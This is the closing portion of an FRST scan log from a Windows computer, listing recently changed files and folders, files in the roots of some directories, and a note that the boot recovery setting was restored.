2019-11-21 20:12 - 2019-02-18 21:23 - 000000000 ____D C:\Program Files (x86)\Microsoft Office 2019-11-21 19:49 - 2017-05-26 16:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments 2019-11-21 17:13 - 2019-07-15 15:01 - 000000000 ____D C:\Users\SR\AppData\Roaming\ViberPC 2019-11-21 01:11 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\LiveKernelReports 2019-11-19 23:10 - 2017-05-26 16:56 - 000000000 ____D C:\Program Files\Native Instruments 2019-11-19 11:34 - 2019-03-02 14:15 - 000634880 _____ C:\Users\SR\Documents\MeNew_v2.fmp12 2019-11-18 17:19 - 2017-09-08 20:54 - 000000000 ____D C:\Users\SR\Documents\REAPER Media 2019-11-18 15:43 - 2019-10-19 15:18 - 000018960 _____ (Logitech, Inc.) C:\Windows\system32\Drivers\LNonPnP.sys 2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData 2019-11-18 14:07 - 2019-10-03 18:47 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData 2019-11-17 21:04 - 2017-09-08 20:57 - 000027684 _____ C:\Users\SR\Desktop\sc3.tmp 2019-11-17 15:25 - 2017-05-26 12:41 - 000000000 ____D C:\Users\SR\Documents\Camtasia Studio 2019-11-17 13:17 - 2018-01-16 19:24 - 000000000 ____D C:\Users\SR\AppData\Roaming\vlc 2019-11-16 00:54 - 2018-01-03 12:14 - 000000000 ____D C:\Program Files (x86)\Dropbox 2019-11-16 00:19 - 2018-11-26 20:34 - 000006144 _____ C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini 2019-11-14 19:23 - 2017-09-08 22:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\Mp3tag 2019-11-14 13:00 - 2018-06-02 15:24 - 000003374 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3967059023-4107875624-2872843465-1001 2019-11-14 13:00 - 2018-06-02 15:19 - 000002403 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2019-11-14 13:00 - 2017-05-25 17:10 - 000000000 ___RD C:\Users\SR\OneDrive 2019-11-14 12:13 - 2018-04-12 15:16 - 000000000 ____D C:\Users\SR\AppData\Local\PlaceholderTileLogoFolder 2019-11-13 15:13 - 2018-02-14 15:35 - 000000000 ____D C:\Users\SR\AppData\Local\Packages 2019-11-13 13:02 - 2017-05-25 19:45 - 000748816 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe 2019-11-12 12:45 - 2018-06-02 15:16 - 005163280 _____ C:\Windows\system32\FNTCACHE.DAT 2019-11-11 17:40 - 2018-01-03 12:23 - 000000000 ___RD C:\Users\SR\Dropbox 2019-11-11 15:38 - 2017-08-27 19:44 - 000000000 ____D C:\Users\SR\AppData\Roaming\Visual Studio Setup 2019-11-11 14:05 - 2018-06-02 15:19 - 000000000 ____D C:\Users\SR 2019-11-11 13:49 - 2015-07-10 13:04 - 000017535 _____ C:\Windows\system32\Drivers\etc\services 2019-11-11 13:48 - 2017-09-07 13:40 - 000000000 ____D C:\Users\SR\.oracle_jre_usage 2019-11-11 13:48 - 2017-05-26 16:29 - 000000000 ____D C:\Program Files\Java 2019-11-11 13:48 - 2017-05-25 21:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2019-11-10 20:52 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Microsoft SDKs 2019-11-10 20:48 - 2017-06-30 19:12 - 000000000 ____D C:\ProgramData\Package Cache 2019-11-10 20:46 - 2018-04-12 01:30 - 000000000 ____D C:\Windows\CbsTemp 2019-11-10 20:34 - 2017-08-27 19:44 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio 2019-11-10 20:34 - 2017-06-11 17:39 - 000000000 ____D C:\Program Files (x86)\Microsoft SQL Server 2019-11-10 20:33 - 2018-06-02 13:14 - 000000000 ____D C:\Program Files (x86)\MSBuild 2019-11-10 20:33 - 2018-04-12 01:38 - 000000000 ____D C:\Program Files\Common Files\microsoft shared 2019-11-10 20:33 - 2017-08-27 19:49 - 000000000 ____D C:\Program Files (x86)\Windows Kits 2019-11-10 16:31 - 2019-01-08 14:50 - 000000000 ____D C:\Users\SR\AppData\Roaming\temp_info_collect 2019-11-10 16:30 - 2019-01-08 14:50 - 000000000 ____D C:\ProgramData\EMM 2019-11-09 19:38 - 2017-08-27 20:07 - 000000000 ____D C:\Users\SR\Documents\Visual Studio 2017 2019-11-09 19:32 - 2017-08-27 19:44 - 000001402 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk 2019-11-08 14:06 - 2019-10-09 15:00 - 000000000 ____D C:\Users\SR\Desktop\Unused Mods 2019-11-08 12:53 - 2017-05-27 13:55 - 000000000 ____D C:\Users\SR\Documents\Flight Simulator X Files 2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files\Mozilla Firefox 2019-11-03 17:55 - 2017-05-25 17:30 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2019-11-03 13:05 - 2017-11-15 14:46 - 000001275 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk 2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IconShepherd 2019-10-31 10:47 - 2019-04-17 23:11 - 000000000 ____D C:\Program Files\IconShepherd 2019-10-29 10:07 - 2018-03-01 10:19 - 000000000 ____D C:\Windows\system32\Drivers\wd 2019-10-28 22:32 - 2018-12-02 22:13 - 000000000 ____D C:\Users\SR\Documents\FIFA 19 ==================== Files in the root of some directories ======== 2019-08-11 17:16 - 2019-08-11 17:16 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll 2019-08-11 17:16 - 2019-08-11 17:16 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll 2017-06-18 13:13 - 2019-10-20 14:44 - 000000132 ____H () C:\Users\SR\AppData\Roaming\Adobe PNG Format CC Prefs 2017-05-27 13:13 - 2017-05-27 13:13 - 000001167 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.1.txt 2017-05-27 13:13 - 2017-05-29 13:58 - 000000905 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt 2017-05-27 13:13 - 2017-05-29 13:58 - 000000000 ____H () C:\Users\SR\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt 2019-06-01 18:59 - 2019-10-20 14:40 - 000001456 _____ () C:\Users\SR\AppData\Local\Adobe Save for Web 13.0 Prefs 2018-11-26 20:34 - 2019-11-16 00:19 - 000006144 _____ () C:\Users\SR\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini 2018-09-27 17:57 - 2018-09-27 17:57 - 000000000 _____ () C:\Users\SR\AppData\Local\oobelibMkey.log 2017-06-05 14:13 - 2017-07-14 23:32 - 000007598 _____ () C:\Users\SR\AppData\Local\Resmon.ResmonCfg 2018-03-01 13:55 - 2019-07-25 12:32 - 000001207 _____ () C:\Users\SR\AppData\Local\SuperJolt.Common.log 2018-03-01 13:55 - 2019-07-25 12:32 - 000002529 _____ () C:\Users\SR\AppData\Local\SuperJolt.Snapper.log 2017-06-10 15:40 - 2017-06-12 13:14 - 000930816 _____ () C:\Users\SR\AppData\Local\test_db_cara.db ==================== SigCheck ============================ (There is no automatic fix for files that do not pass verification.) BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully ==================== End of FRST.txt ========================